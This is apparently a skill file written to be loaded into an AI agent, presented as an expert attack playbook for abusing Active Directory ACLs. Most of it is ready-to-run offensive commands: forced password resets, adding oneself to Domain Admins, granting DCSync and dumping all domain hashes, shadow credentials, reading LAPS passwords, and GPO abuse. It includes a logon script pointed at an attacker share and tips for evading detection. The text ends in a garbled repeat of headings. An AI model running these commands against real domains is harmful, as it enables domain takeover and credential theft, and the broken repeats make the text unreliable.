SKILL: AD ACL Abuse — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns. 0. RELATED ROUTING Before going deep, consider loading: active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse active-directory-certificate-services for certificate-based attacks after ACL exploitation ntlm-relay-coercion for relay attacks that can set ACLs (LDAP relay) windows-lateral-movement after gaining elevated AD access Advanced Reference Also load BLOODHOUND_PATHS.md when you need: Common BloodHound attack paths with Cypher queries Custom Neo4j queries for finding complex chains Data collection and ingestion tips 1. BLOODHOUND ENUMERATION Data Collection

SharpHound (from Windows, domain-joined)

SharpHound.exe -c all --outputdirectory C: \ temp --zipfilename bh.zip

bloodhound-python (from Linux)

bloodhound-python -d domain.com -u user -p password -c all -dc DC01.domain.com -ns DC_IP

Specific collection methods

SharpHound.exe -c DCOnly

Fastest — only DC queries

SharpHound.exe -c Session

Session data only (run periodically)

SharpHound.exe -c All,GPOLocalGroup

Include GPO analysis

Key BloodHound Queries (Built-in) "Find all Domain Admins" "Shortest Paths to Domain Admins from Owned Principals" "Find Principals with DCSync Rights" "Shortest Paths to Unconstrained Delegation Systems" "Find computers where Domain Users are Local Admin" 2. DANGEROUS ACE TYPES ACE Effect on Users Effect on Groups Effect on Computers GenericAll Change password, set SPN, modify attributes Add members RBCD, LAPS read, all attributes GenericWrite Set SPN, modify attributes, shadow creds Add members RBCD, shadow credentials WriteDACL Grant yourself any permission Same Same WriteOwner Take ownership → then WriteDACL Same Same ForceChangePassword Reset password without knowing old N/A N/A AddMember N/A Add self/others to group N/A AllExtendedRights Force change password, read LAPS N/A Read LAPS, BitLocker keys ReadLAPSPassword N/A N/A Read local admin password WriteSPN Set SPN → targeted kerberoast N/A N/A 3. ACE-SPECIFIC EXPLOITATION GenericAll on User

Option 1: Force change password

net user targetuser NewP@ss123 / domain

Option 2: Targeted Kerberoasting

Set-DomainObject

Identity targetuser

Set @ { serviceprincipalname= 'fake/svc' }

→ Kerberoast, then clear SPN

Option 3: Shadow Credentials

Whisker . exe add / target:targetuser / domain:domain . com / dc:DC01

Option 4: Set logon script

Set-DomainObject

Identity targetuser

Set @ { scriptpath= '\attacker\share\evil.ps1' } GenericAll / GenericWrite on Computer

RBCD attack

rbcd.py -delegate-from 'CONTROLLED$' -delegate-to 'TARGET$' -action write DOMAIN/user:pass -dc-ip DC

Shadow Credentials on computer

pywhisker.py -d domain.com -u user -p pass --target 'TARGET$' --action add --dc-ip DC WriteDACL

Grant DCSync rights to yourself

Add-DomainObjectAcl

TargetIdentity "DC=domain,DC=com" - PrincipalIdentity lowpriv - Rights DCSync

Impacket

dacledit . py - action write - rights DCSync - principal lowpriv - target-dn "DC=domain,DC=com" DOMAIN/lowpriv:pass - dc-ip DC WriteOwner

Step 1: Take ownership

Set-DomainObjectOwner

Identity targetuser

OwnerIdentity lowpriv

Step 2: Grant WriteDACL to yourself (as owner)

Add-DomainObjectAcl

TargetIdentity targetuser

PrincipalIdentity lowpriv

Rights All

Step 3: Now exploit as GenericAll

ForceChangePassword

Impacket

rpcclient -U 'DOMAIN/attacker%pass' DC01 -c "setuserinfo2 targetuser 23 'NewP@ss123!'"

PowerView

Set-DomainUserPassword -Identity targetuser -AccountPassword ( ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force )

net rpc

net rpc password targetuser 'NewP@ss123!' -U DOMAIN/attacker%pass -S DC01 AddMember to Group

Add self to privileged group

Add-DomainGroupMember

Identity "Domain Admins" - Members lowpriv

Impacket

net rpc group addmem "Domain Admins" lowpriv - U DOMAIN/attacker%pass - S DC01 4. DCSYNC ATTACK Prerequisites The principal needs both of these replication rights on the domain object: DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 ) DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 ) Execution

Impacket — dump all hashes

secretsdump.py DOMAIN/user:password@DC01 -just-dc

Specific account only

secretsdump.py DOMAIN/user:password@DC01 -just-dc-user krbtgt

Mimikatz

lsadump::dcsync /domain:domain.com /user:krbtgt lsadump::dcsync /domain:domain.com /all /csv

Impacket with Kerberos auth

export KRB5CCNAME = admin.ccache secretsdump.py -k -no-pass DC01.domain.com -just-dc Who Has DCSync by Default? Domain Admins Enterprise Admins Domain Controllers group BUILTIN\Administrators (on domain object) 5. SHADOW CREDENTIALS Attack Flow Write msDS-KeyCredentialLink on target → generate certificate → authenticate via PKINIT.

pyWhisker (Linux)

pywhisker.py -d domain.com -u attacker -p pass --target victim --action add --dc-ip DC01

Output: DeviceID and PFX file

Authenticate with certificate

gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass RANDOM_PASS domain.com/victim victim.ccache export KRB5CCNAME = victim.ccache

Extract NT hash from TGT (for pass-the-hash)

getnthash.py -key AS_REP_KEY domain.com/victim

Whisker (Windows)

Whisker . exe add / target:victim / domain:domain . com / dc:DC01 . domain . com

→ Provides Rubeus command to get TGT

Rubeus
.
exe asktgt
/
user:victim
/
certificate:CERT_B64
/
password:PASS
/
ptt
Cleanup: Remove the added key credential to avoid detection. 6. LAPS PASSWORD READING

PowerView

Get-DomainComputer

Identity TARGET

Properties ms-Mcs-AdmPwd , ms-Mcs-AdmPwdExpirationTime

AD Module

Get-ADComputer

Identity TARGET

Properties ms-Mcs-AdmPwd | Select-Object ms-Mcs-AdmPwd

LAPS v2 (Windows LAPS)

Get-LapsADPassword

Identity TARGET

AsPlainText

CrackMapExec

crackmapexec ldap DC01

u user

p pass

module laps 7. GPO ABUSE Identify Writable GPOs

PowerView — find GPOs where you have write access

Get-DomainGPO | Get-DomainObjectAcl - ResolveGUIDs | Where-Object { ( $ . ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite' ) -and ( $ . SecurityIdentifier -match 'YOUR_SID' ) } Exploit via SharpGPOAbuse

Add local admin via GPO

SharpGPOAbuse.exe --AddLocalAdmin --UserAccount lowpriv --GPOName "Vulnerable GPO"

Add scheduled task via GPO

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\admin --Command "cmd.exe" --Arguments "/c net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"

Add startup script

SharpGPOAbuse.exe --AddComputerScript --ScriptName "evil.bat" --ScriptContents "net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"

pyGPOAbuse (Linux)

pygpoabuse.py DOMAIN/user:pass -gpo-id "GPO_GUID" -command "net localgroup administrators lowpriv /add" -dc-ip DC01 8. ACL ATTACK DECISION TREE Have domain user access — want to escalate via ACL │ ├── Run BloodHound → analyze shortest paths to DA │ └── Upload data → "Shortest Paths to Domain Admins from Owned Principals" │ ├── Direct ACL on user object? │ ├── GenericAll → force password change, shadow creds, or targeted kerberoast (§3) │ ├── GenericWrite → shadow credentials or set SPN (§3/§5) │ ├── ForceChangePassword → reset password directly (§3) │ ├── WriteDACL → grant yourself GenericAll, then exploit (§3) │ └── WriteOwner → take ownership → WriteDACL → GenericAll (§3) │ ├── ACL on group? │ ├── AddMember / GenericAll → add self to privileged group (§3) │ └── WriteDACL → grant AddMember, then add self │ ├── ACL on computer object? │ ├── GenericAll/GenericWrite → RBCD attack (§3) │ ├── AllExtendedRights → read LAPS password (§6) │ └── GenericWrite → shadow credentials on machine (§5) │ ├── ACL on domain object? │ ├── WriteDACL → grant DCSync rights to self (§4) │ └── Replication rights already? → DCSync directly (§4) │ ├── ACL on GPO linked to privileged OU? │ └── Write access → add admin / scheduled task via GPO (§7) │ └── Complex multi-hop chain? └── Load BLOODHOUND_PATHS.md for Cypher queries and chain analysis

安装

SharpHound (from Windows, domain-joined)

bloodhound-python (from Linux)

Specific collection methods

Fastest — only DC queries

Session data only (run periodically)

Include GPO analysis

Option 1: Force change password

Option 2: Targeted Kerberoasting

Set-DomainObject

Identity targetuser

→ Kerberoast, then clear SPN

Option 3: Shadow Credentials

Option 4: Set logon script

Set-DomainObject

Identity targetuser

RBCD attack

Shadow Credentials on computer

Grant DCSync rights to yourself

Add-DomainObjectAcl

Impacket

Step 1: Take ownership

Set-DomainObjectOwner

Identity targetuser

Step 2: Grant WriteDACL to yourself (as owner)

Add-DomainObjectAcl

TargetIdentity targetuser

PrincipalIdentity lowpriv

Step 3: Now exploit as GenericAll

Impacket

PowerView

net rpc

Add self to privileged group

Add-DomainGroupMember

Impacket

Impacket — dump all hashes

Specific account only

Mimikatz

Impacket with Kerberos auth

pyWhisker (Linux)

Output: DeviceID and PFX file

Authenticate with certificate

Extract NT hash from TGT (for pass-the-hash)

Whisker (Windows)

→ Provides Rubeus command to get TGT

PowerView

Get-DomainComputer

Identity TARGET

AD Module

Get-ADComputer

Identity TARGET

LAPS v2 (Windows LAPS)

Get-LapsADPassword

Identity TARGET

CrackMapExec

crackmapexec ldap DC01

u user

p pass

PowerView — find GPOs where you have write access

Add local admin via GPO

Add scheduled task via GPO

Add startup script

pyGPOAbuse (Linux)